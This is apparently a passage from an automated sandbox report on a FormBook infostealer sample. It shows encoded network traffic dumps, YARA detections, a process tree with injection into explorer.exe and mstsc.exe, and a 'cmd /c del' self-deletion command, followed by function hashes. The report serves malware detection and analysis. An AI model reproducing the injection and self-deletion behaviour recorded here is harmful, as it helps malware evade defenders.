Aug 3, 2021 18:14:48.629973888 CEST	9218	IN	Data Raw: 41 62 54 6a 45 6d 75 66 55 51 6f 51 67 41 37 52 69 72 39 61 39 68 5a 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75 Data Ascii: AbTjEmufUQoQgA7Rir9a9hZxqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+
Aug 3, 2021 18:14:48.629988909 CEST	9219	IN	Data Raw: 64 57 72 56 38 34 7a 76 71 7a 55 70 39 38 37 66 66 4f 71 71 2b 70 6a 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a Data Ascii: dWrV84zvqzUp987ffOqq+pj4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS
Aug 3, 2021 18:14:48.630004883 CEST	9220	IN	Data Raw: 73 55 74 73 78 4c 45 35 68 38 53 70 70 4e 4d 66 78 35 69 6a 57 48 70 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a Data Ascii: sUtsxLE5h8SppNMfx5ijWHpb3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFI
Aug 3, 2021 18:14:48.630021095 CEST	9222	IN	Data Raw: 6a 66 69 63 35 33 53 6e 75 34 72 53 74 2b 48 74 59 6a 2b 4a 76 41 47 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77 Data Ascii: jfic53Snu4rSt+HtYj+JvAGJIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2u
Aug 3, 2021 18:14:48.630037069 CEST	9223	IN	Data Raw: 49 73 56 6e 48 51 76 47 66 48 4a 59 2b 47 73 46 4f 76 65 49 61 4c 6b 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79 Data Ascii: IsVnHQvGfHJY+GsFOveIaLkZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3
Aug 3, 2021 18:14:48.630058050 CEST	9224	IN	Data Raw: 62 61 4b 64 68 59 6b 30 71 76 4f 51 56 49 71 79 6b 70 38 72 73 6c 57 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53 Data Ascii: baKdhYk0qvOQVIqykp8rslWKKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOY
Aug 3, 2021 18:14:48.630080938 CEST	9226	IN	Data Raw: 50 33 55 43 44 61 59 67 2f 34 41 2f 4a 38 2b 65 6d 71 41 74 30 47 53 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73 Data Ascii: P3UCDaYg/4A/J8+emqAt0GSW9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBW
Aug 3, 2021 18:14:48.737709045 CEST	9227	IN	Data Raw: 39 79 46 49 39 70 49 64 59 71 59 66 31 4d 41 4e 36 52 49 2b 77 53 49 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37 Data Ascii: 9yFI9pIdYqYf1MAN6RI+wSI/qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMf

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: JFBlvEr5H9.exe PID: 2036 Parent PID: 5628

General

Start time:	18:12:44
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\JFBlvEr5H9.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\JFBlvEr5H9.exe'
Imagebase:	0x540000
File size:	1336832 bytes
MD5 hash:	214B1DDF045E4D6FDD73A5C8788D2ADC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.259577263.0000000002E41000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: JFBlvEr5H9.exe PID: 1760 Parent PID: 2036

General

Start time:	18:12:55
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\JFBlvEr5H9.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\JFBlvEr5H9.exe
Imagebase:	0xa70000
File size:	1336832 bytes
MD5 hash:	214B1DDF045E4D6FDD73A5C8788D2ADC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3472 Parent PID: 1760

General

Start time:	18:12:58
Start date:	03/08/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: mstsc.exe PID: 6868 Parent PID: 1760

General

Start time:	18:13:40
Start date:	03/08/2021
Path:	C:\Windows\SysWOW64\mstsc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\mstsc.exe
Imagebase:	0x1330000
File size:	3444224 bytes
MD5 hash:	2412003BE253A515C620CE4890F3D8F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 7048 Parent PID: 6868

General

Start time:	18:13:42
Start date:	03/08/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\JFBlvEr5H9.exe'
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 7104 Parent PID: 7048

General

Start time:	18:13:42
Start date:	03/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: JFBlvEr5H9.exe PID: 2036 Parent PID: 5628 JFBlvEr5H9.exeCOMMON

Executed Functions

Function 01082630, Relevance: .4, Instructions: 398COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.258611628.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07e9b35bf253ed10ced890942936c16ff6761554f75992519577fbdbf639958a
Instruction ID: 4649b15916035a6f394d44ac25851040eda0556e7a0386ad96e6c9ed672bc18b
Opcode Fuzzy Hash: 07e9b35bf253ed10ced890942936c16ff6761554f75992519577fbdbf639958a
Instruction Fuzzy Hash: DEE1DF70B052059FEB29EB6AC454BAEB7F6AF89300F1444ADE2C69B390DF34D901CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01080418, Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.258611628.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6968985e26aae44cc74023580f0bac60dcbcb0428ae6a4acf8d30e7e32d04e8c
Instruction ID: 874e5608eaa4aba58c81a79d67b21500a6c6389e9860ce4a35cccaa83a8cfdd1
Opcode Fuzzy Hash: 6968985e26aae44cc74023580f0bac60dcbcb0428ae6a4acf8d30e7e32d04e8c
Instruction Fuzzy Hash: 3F714971E48629CFDB24DF56CC40BEEB7B6BFC9300F14D5AAD549A6214EB305A868F10

Uniqueness

Uniqueness Score: -1.00%

Function 01082130, Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.258611628.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2ecc70a11faecd899b924bfcca58115c303c2b9ed9e44ad33c8e7af22e7c5b1
Instruction ID: 1263b073db26d15cad9bf0ec894b000140bd3bc13147eb58b03efafcf4ab3b39
Opcode Fuzzy Hash: b2ecc70a11faecd899b924bfcca58115c303c2b9ed9e44ad33c8e7af22e7c5b1
Instruction Fuzzy Hash: 02218E38E192199BDF51DFA9D854BEEBBF5AF4A300F205066EA85F3240DB30C944CB64

Uniqueness

Uniqueness Score: -1.00%

Function 01082121, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.258611628.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ab1d5dac797571dbdb559910412774f39e17b76d270fb85856c171aac51418f
Instruction ID: b882419071827bd707b80c318dabc6e0116d207a2e4b99fc78214ac11a6eb634
Opcode Fuzzy Hash: 1ab1d5dac797571dbdb559910412774f39e17b76d270fb85856c171aac51418f
Instruction Fuzzy Hash: 0C216D34D152199BDF11DFA8D894BEEBBF0AB0A340F2444AAE981F7250DB34C944CB64

Uniqueness

Uniqueness Score: -1.00%

Function 010EBD70, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 010EBDD0
GetCurrentThread.KERNEL32 ref: 010EBE0D
GetCurrentProcess.KERNEL32 ref: 010EBE4A
GetCurrentThreadId.KERNEL32 ref: 010EBEA3

Memory Dump Source

Source File: 00000000.00000002.258638374.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 1107b065f4dce3d6e57c506c3aa878b6fef1845de64e8608775105e84b61625e
Instruction ID: 19f6ebb29c1ef66a55ee1ec54f7105049ae2a9902e6126405bf6c90df48a551f
Opcode Fuzzy Hash: 1107b065f4dce3d6e57c506c3aa878b6fef1845de64e8608775105e84b61625e
Instruction Fuzzy Hash: F75155B0E007598FDB14CFAAC588BDFBBF0AB48318F248499E559A7350DB749848CB65

Uniqueness

Uniqueness Score: -1.00%

Function 010E9A88, Relevance: 1.7, APIs: 1, Instructions: 197COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 010E9CCE

Memory Dump Source

Source File: 00000000.00000002.258638374.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 06545fbd44b1312e2c68f9748f9374ae5234961f0c2f607f2b62341f7174f442
Instruction ID: b38a8293b00fab7c47f6a823030eb77152a63e14f2e9840c7ae84ae334bcd9f0
Opcode Fuzzy Hash: 06545fbd44b1312e2c68f9748f9374ae5234961f0c2f607f2b62341f7174f442
Instruction Fuzzy Hash: 91712670A00B058FDB64DF2AD55579ABBF1BF88208F00896ED58ADBB40DB75E805CF91

Uniqueness

Uniqueness Score: -1.00%

Function 010E4514, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 010E5A81

Memory Dump Source

Source File: 00000000.00000002.258638374.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 303fc6470c62b912d54ef2f271d7ab854877b33090bf3bf54285b08531490eea
Instruction ID: 9564f8fd619a390ddf792dc72ca80932fdd1432056d928632370666c2a808594
Opcode Fuzzy Hash: 303fc6470c62b912d54ef2f271d7ab854877b33090bf3bf54285b08531490eea
Instruction Fuzzy Hash: 7F41DF71D0471C8EDB24CFAAC888B8EBBF1BB48308F14845AD509AB250DB745949CF90

Uniqueness

Uniqueness Score: -1.00%

Function 010EC398, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010EC427

Memory Dump Source

Source File: 00000000.00000002.258638374.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1d0eceee22549fd677ad012e943c9ec2654c63d0e9ff1a9831b7833946babc48
Instruction ID: d803fc1679d2f534eeec3c6fd0f34f03c489170a930d55269082645e28ebad3c
Opcode Fuzzy Hash: 1d0eceee22549fd677ad012e943c9ec2654c63d0e9ff1a9831b7833946babc48
Instruction Fuzzy Hash: D021E6B59002489FDB10CFAAD984AEEBFF4FB58324F14841AE954B7310D374A945DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 010EC3A0, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010EC427

Memory Dump Source

Source File: 00000000.00000002.258638374.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 327c10928a2f683ca2c7336c14eef1176495e036af913922dc8a58fc987e2c71
Instruction ID: 25da55cd792ef1602d7543ee81480f77cfd66b3eebbcedeea2e64a0ffaae96f8
Opcode Fuzzy Hash: 327c10928a2f683ca2c7336c14eef1176495e036af913922dc8a58fc987e2c71
Instruction Fuzzy Hash: F421C4B59002489FDB10CF9AD984ADEBBF4FB48324F14841AE954A3350D778A944DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 010E8E18, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,010E9D49,00000800,00000000,00000000), ref: 010E9F5A

Memory Dump Source

Source File: 00000000.00000002.258638374.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 44106d010d40def69145ea80eb70af52a25550b232d832120962e47fc7606e8e
Instruction ID: 1a9731311189caddc98a45cd0878966d591f8617f9ee73f28430dcb4657c336c
Opcode Fuzzy Hash: 44106d010d40def69145ea80eb70af52a25550b232d832120962e47fc7606e8e
Instruction Fuzzy Hash: E81103B69042498FDB10CF9AC848ADEFBF4AB88314F14842AE559B7600C778A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 010E9C68, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 010E9CCE

Memory Dump Source

Source File: 00000000.00000002.258638374.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 72afc62433a09c99899a380eba7225f8169f3a17b61848252ee44b46db2838b7
Instruction ID: 10d9b98b6b4f35c61898a371d995d709195fefec51932a604a33a443c2d7902c
Opcode Fuzzy Hash: 72afc62433a09c99899a380eba7225f8169f3a17b61848252ee44b46db2838b7
Instruction Fuzzy Hash: 3711E3B5D007498FDB10DF9AC444BDEFBF4AB88224F14845AD559A7700D374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01081DF8, Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 01081E5D

Memory Dump Source

Source File: 00000000.00000002.258611628.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: f7c530f1f4ca6e832a1145e6b4fbefdab76aaba71ffe07ebf73d78d62ab0ef65
Instruction ID: 8a4aa5a13fe70a9d27da96de76584a5d6cffcfe73acf38edd8ff899f50000881
Opcode Fuzzy Hash: f7c530f1f4ca6e832a1145e6b4fbefdab76aaba71ffe07ebf73d78d62ab0ef65
Instruction Fuzzy Hash: 2C11F5B58003499FDB10CF99D884BDEFFF4EB58324F14845AE955A3640D374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01081E00, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 01081E5D

Memory Dump Source

Source File: 00000000.00000002.258611628.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 1ee1be642b27b7909a50a2ae09af970642940fa897261a2c694d98adfc704c41
Instruction ID: 62fd164b32280a5ecdb75e3eba87636c93a32d185eb4f60926411ceccd20dded
Opcode Fuzzy Hash: 1ee1be642b27b7909a50a2ae09af970642940fa897261a2c694d98adfc704c41
Instruction Fuzzy Hash: EC11D0B59003499FDB10DF9AD884BDFBBF8EB48324F10845AE558A7640C374A984CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B6D4C4, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.258034689.0000000000B6D000.00000040.00000001.sdmp, Offset: 00B6D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85d885744236c13e13e48934da47cba808e635e9e963d494406e638f27f1e24e
Instruction ID: 1baf6165d4e4acdd9b27e1feed75c41b30df8de35f45024c01bb93869cea721c
Opcode Fuzzy Hash: 85d885744236c13e13e48934da47cba808e635e9e963d494406e638f27f1e24e
Instruction Fuzzy Hash: 58213A72B04244DFDB15DF14D8C0F2ABFA5FB98318F24C5A9E9064B646C33AD845DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B7D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.258059675.0000000000B7D000.00000040.00000001.sdmp, Offset: 00B7D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39f6865b8594bc61bcfd084de30baa311407a75c384a7e3692a3f9f41b718886
Instruction ID: 4f797883e9686c3a38b7a43453ac0972ecf89f528debeee1ac755f4cdeca484b
Opcode Fuzzy Hash: 39f6865b8594bc61bcfd084de30baa311407a75c384a7e3692a3f9f41b718886
Instruction Fuzzy Hash: 1F21F275608244DFCB14DF14D9D0B26BBB5FF88354F24C5ADE90E4B246C33AD846CA61

Uniqueness

Uniqueness Score: -1.00%

Function 00B7D006, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.258059675.0000000000B7D000.00000040.00000001.sdmp, Offset: 00B7D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2501eac20af0d692044ae5c75d5dfb42fae997bf49f61ca9cf2e02483426a8c1
Instruction ID: e693eb666e68d53f0e966b9dd83e02faed1af229c0baf918ac4d9da65ce4dacc
Opcode Fuzzy Hash: 2501eac20af0d692044ae5c75d5dfb42fae997bf49f61ca9cf2e02483426a8c1
Instruction Fuzzy Hash: F92162755083849FCB02CF14D994B15BFB1EF46314F28C5DAD8498B297C33AD85ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00B6D4BF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.258034689.0000000000B6D000.00000040.00000001.sdmp, Offset: 00B6D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a9d003929d6dc02cb6594d9b18e81f81af5a06eac6336c657b4c9dac273578b
Instruction ID: ffcc15d02dbcae5e048255da1944c589776b63569aa59b7fcf578c5edb2a747f
Opcode Fuzzy Hash: 2a9d003929d6dc02cb6594d9b18e81f81af5a06eac6336c657b4c9dac273578b
Instruction Fuzzy Hash: 8A11D376904280CFCF11CF10D9C4B16BFB1FB94324F28C6AAD8450B656C33AD85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B6D731, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.258034689.0000000000B6D000.00000040.00000001.sdmp, Offset: 00B6D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 636db5285755891e6aa92364fde6d4202ee54fca771e060be65cc48b8725a0a6
Instruction ID: 981a3699327a006431e60135c865e1e7e6487fd5a32f80b7a616a7159ad6d8f9
Opcode Fuzzy Hash: 636db5285755891e6aa92364fde6d4202ee54fca771e060be65cc48b8725a0a6
Instruction Fuzzy Hash: 9001A771A083849AE7104A26CCC477BFBD8EF45368F1885A9ED145A246D77C9C44D6B2

Uniqueness

Uniqueness Score: -1.00%

Function 00B6D730, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.258034689.0000000000B6D000.00000040.00000001.sdmp, Offset: 00B6D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce4acd12dc49eec7e6b74a9651028473020998b2aea0ad6d5782f9bbadc1f10d
Instruction ID: dc43a45cb4b93548935cf4d4b155975f3fe7362c933829057a9789e510ecb92e
Opcode Fuzzy Hash: ce4acd12dc49eec7e6b74a9651028473020998b2aea0ad6d5782f9bbadc1f10d
Instruction Fuzzy Hash: F4F062765043849EEB108A16CCC4B77FBD8EB91778F18C59AED085B286C3789C44CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0054B673, Relevance: 2.5, Instructions: 2457COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.257575816.0000000000542000.00000002.00020000.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.257566742.0000000000540000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.257828156.000000000064A000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69f0e6cc5ef3304b1faefb1ae3833e2d98d83ae8b92aa53af6c4910d93ce75b3
